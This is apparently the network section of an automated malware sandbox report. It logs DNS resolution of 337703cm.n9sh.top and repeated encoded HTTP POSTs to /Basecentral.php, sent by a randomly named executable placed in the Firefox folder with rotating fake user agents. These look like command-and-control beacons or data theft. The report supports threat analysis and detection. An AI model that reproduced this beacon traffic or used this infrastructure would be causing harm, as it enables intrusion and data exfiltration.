Jan 6, 2025 10:32:55.333323002 CET	49739	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:55.333467007 CET	49739	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:55.338206053 CET	80	49739	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:55.682075977 CET	49739	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:55.687035084 CET	80	49739	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:55.989681005 CET	80	49739	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:56.041266918 CET	49739	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:56.125658035 CET	80	49739	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:56.191665888 CET	49739	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:04.752546072 CET	49782	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:04.757299900 CET	80	49782	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:04.757363081 CET	49782	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:04.757555962 CET	49782	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:04.762326956 CET	80	49782	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:05.104063034 CET	49782	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:05.108921051 CET	80	49782	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:05.394202948 CET	80	49782	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:05.478784084 CET	49782	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:05.521846056 CET	80	49782	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:05.613255978 CET	49782	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:07.349590063 CET	49798	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:07.355706930 CET	80	49798	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:07.355782032 CET	49798	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:07.355959892 CET	49798	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:07.360673904 CET	80	49798	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:07.713555098 CET	49798	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:07.718372107 CET	80	49798	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:08.009283066 CET	80	49798	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:08.131526947 CET	80	49798	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:08.131571054 CET	49798	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:08.290472031 CET	49798	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:14.406150103 CET	49834	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:14.410950899 CET	80	49834	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:14.411030054 CET	49834	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:14.411196947 CET	49834	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:14.416944981 CET	80	49834	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:14.760195971 CET	49834	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:14.765196085 CET	80	49834	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:15.067878962 CET	80	49834	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:15.150710106 CET	49834	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:15.201617002 CET	80	49834	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:15.300421000 CET	49834	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:19.152020931 CET	49865	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:19.157010078 CET	80	49865	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:19.157339096 CET	49865	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:19.157582998 CET	49865	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:19.162358046 CET	80	49865	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:19.510318995 CET	49865	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:19.516613960 CET	80	49865	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:19.822838068 CET	80	49865	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:19.955363989 CET	80	49865	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:19.955460072 CET	49865	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:20.024878025 CET	49865	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:41.343126059 CET	49992	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:41.347951889 CET	80	49992	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:41.348479033 CET	49992	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:41.348767042 CET	49992	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:41.353564024 CET	80	49992	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:41.697745085 CET	49992	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:41.702589989 CET	80	49992	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:42.010540009 CET	80	49992	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:42.142652988 CET	80	49992	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:42.144022942 CET	49992	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:42.380469084 CET	49992	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:50.663026094 CET	50011	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:50.668087959 CET	80	50011	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:50.668159008 CET	50011	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:50.668339014 CET	50011	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:50.673062086 CET	80	50011	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:51.026005983 CET	50011	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:51.031039000 CET	80	50011	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:51.324202061 CET	80	50011	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:51.433463097 CET	50011	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:51.457631111 CET	80	50011	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:51.537460089 CET	50011	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:53.789799929 CET	50012	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:53.794672966 CET	80	50012	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:53.795727968 CET	50012	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:53.795926094 CET	50012	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:53.800811052 CET	80	50012	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:54.151110888 CET	50012	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:54.155998945 CET	80	50012	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:54.432619095 CET	80	50012	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:54.546858072 CET	50012	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:54.566454887 CET	80	50012	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:54.637589931 CET	50012	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:59.151829004 CET	50013	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:59.156699896 CET	80	50013	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:59.156760931 CET	50013	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:59.156932116 CET	50013	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:59.161700010 CET	80	50013	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:59.510288000 CET	50013	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:33:59.515114069 CET	80	50013	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:59.812834024 CET	80	50013	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:59.945585966 CET	80	50013	185.158.202.52	192.168.2.4
Jan 6, 2025 10:33:59.945702076 CET	50013	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:00.453303099 CET	50013	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:02.969106913 CET	50014	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:02.974052906 CET	80	50014	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:02.974112988 CET	50014	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:02.974296093 CET	50014	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:02.979986906 CET	80	50014	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:03.322859049 CET	50014	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:03.327759027 CET	80	50014	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:03.608345032 CET	80	50014	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:03.737171888 CET	80	50014	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:03.737222910 CET	50014	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:03.837644100 CET	50014	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:26.286722898 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:26.291650057 CET	80	50015	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:26.291726112 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:26.291866064 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:26.296634912 CET	80	50015	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:26.651206970 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:26.656092882 CET	80	50015	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:26.930805922 CET	80	50015	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:26.981496096 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:27.061758041 CET	80	50015	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:27.103976965 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:27.158623934 CET	50015	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:37.409332037 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:37.414278030 CET	80	50016	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:37.414365053 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:37.414577961 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:37.419373989 CET	80	50016	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:37.760387897 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:37.765290022 CET	80	50016	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:38.071033001 CET	80	50016	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:38.119621038 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:38.201706886 CET	80	50016	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:38.244632959 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:38.304704905 CET	50016	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:44.429852962 CET	50017	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:44.434762001 CET	80	50017	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:44.434843063 CET	50017	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:44.435009003 CET	50017	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:44.439802885 CET	80	50017	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:44.791646957 CET	50017	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:44.796523094 CET	80	50017	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:45.072540998 CET	80	50017	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:45.119628906 CET	50017	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:45.201836109 CET	80	50017	185.158.202.52	192.168.2.4
Jan 6, 2025 10:34:45.244640112 CET	50017	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:34:45.310894966 CET	50017	80	192.168.2.4	185.158.202.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 10:32:21.752769947 CET	50498	53	192.168.2.4	1.1.1.1
Jan 6, 2025 10:32:22.248508930 CET	53	50498	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 10:32:21.752769947 CET	192.168.2.4	1.1.1.1	0xb777	Standard query (0)	337703cm.n9sh.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 10:32:22.248508930 CET	1.1.1.1	192.168.2.4	0xb777	No error (0)	337703cm.n9sh.top		185.158.202.52	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

337703cm.n9sh.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.158.202.52	80	4040	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:32:22.258539915 CET	320	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:32:22.604522943 CET	344	OUT	Data Raw: 00 07 01 01 06 0a 01 0a 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54 Data Ascii: Q[T[QQTQV\L~CY~`iaekUhRWvtO\|]pJ{x_xYjDSlvww^u~V@BxmbN~LW
Jan 6, 2025 10:32:22.899094105 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:32:23.030473948 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:32:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.4	49738	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:32:47.166146994 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:32:47.510158062 CET	344	OUT	Data Raw: 05 05 01 07 06 0b 01 07 05 06 02 01 02 06 01 02 00 03 05 01 02 0d 03 09 03 06 0c 06 05 02 01 02 0c 0e 04 5e 01 0d 05 06 0c 00 02 05 07 05 05 05 05 05 0f 00 0c 07 04 56 04 05 04 00 04 04 05 5f 01 04 0a 0d 00 00 06 07 0f 03 0c 0f 0a 01 0c 55 07 07 Data Ascii: ^V_UVT\L~~syZ`b_wfT\|\|etRwY\|s^I{R{lNfDmoR`dhiO~V@Bxmvbu
Jan 6, 2025 10:32:47.830596924 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:32:47.962645054 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:32:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49739	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:32:55.333467007 CET	255	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:32:55.682075977 CET	344	OUT	Data Raw: 00 04 04 00 03 0f 04 05 05 06 02 01 02 00 01 01 00 05 05 01 02 01 03 08 00 00 0f 04 04 55 00 04 0f 53 06 01 02 50 06 55 0e 0a 06 06 06 04 06 56 03 05 0c 5d 0c 05 06 57 04 0e 03 04 04 05 04 0f 00 0a 0f 5b 06 0f 06 02 0d 0e 0e 52 0a 05 0e 54 02 05 Data Ascii: USPUV]W[RTRW\L~`X@wbyuwQ\|\|SOwo]\|Mpl\|Q{^~Cxcd\|}O~V@xSn~bq
Jan 6, 2025 10:32:55.989681005 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:32:56.125658035 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:32:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49782	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:04.757555962 CET	255	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:05.104063034 CET	344	OUT	Data Raw: 00 00 01 00 06 0c 01 04 05 06 02 01 02 0d 01 07 00 04 05 0d 02 04 03 00 03 04 0d 53 07 01 00 01 0c 03 06 0f 00 57 07 00 0c 0a 07 04 07 03 07 03 03 0a 0d 08 0a 04 01 0a 06 04 07 05 04 00 07 01 00 00 0f 0d 05 54 05 01 0b 03 0f 06 0c 02 0d 06 07 53 Data Ascii: SWTSUYP\L~@pf@`[mBv`aOtlxhcx{R{a^SZtY{_}e~V@{}T}rW
Jan 6, 2025 10:33:05.394202948 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:05.521846056 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49798	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:07.355959892 CET	320	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:07.713555098 CET	344	OUT	Data Raw: 00 0b 04 02 03 0b 01 0b 05 06 02 01 02 02 01 01 00 01 05 09 02 07 03 0c 03 01 0d 06 04 55 03 00 0f 01 04 0f 02 06 04 05 0d 0a 02 04 04 02 02 00 07 02 0e 59 0c 03 07 52 07 0e 03 07 04 56 06 01 01 05 0f 09 05 06 01 07 0c 04 0f 57 0c 54 0e 52 04 07 Data Ascii: UYRVWTRZ\L~Nbc[v_v[]R\|vYwl`MhMtxB{Exf\|C\|tYR~e~V@xS~N}La
Jan 6, 2025 10:33:08.009283066 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:08.131526947 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49834	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:14.411196947 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 6, 2025 10:33:14.760195971 CET	344	OUT	Data Raw: 05 05 04 04 03 0d 04 05 05 06 02 01 02 07 01 04 00 05 05 09 02 06 03 0d 02 53 0d 00 05 0f 03 04 0f 56 07 09 01 07 05 52 0b 0b 07 57 00 0a 04 56 06 0b 0b 0d 0d 00 04 0a 04 50 04 00 01 01 00 0d 01 01 0a 08 07 05 06 54 0e 04 0b 01 0c 0c 0e 02 07 50 Data Ascii: SVRWVPTP\L}S\|Ye_tqbYuuRk\|\Xvs\chxl`[lN~k``pNi_~V@A{CnN}\e
Jan 6, 2025 10:33:15.067878962 CET	25	IN	HTTP/1.1 100 Continue
Jan 6, 2025 10:33:15.201617002 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 09:33:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49865	185.158.202.52	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 10:33:19.157582998 CET	303	OUT	POST /Basecentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 337703cm.n9sh.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
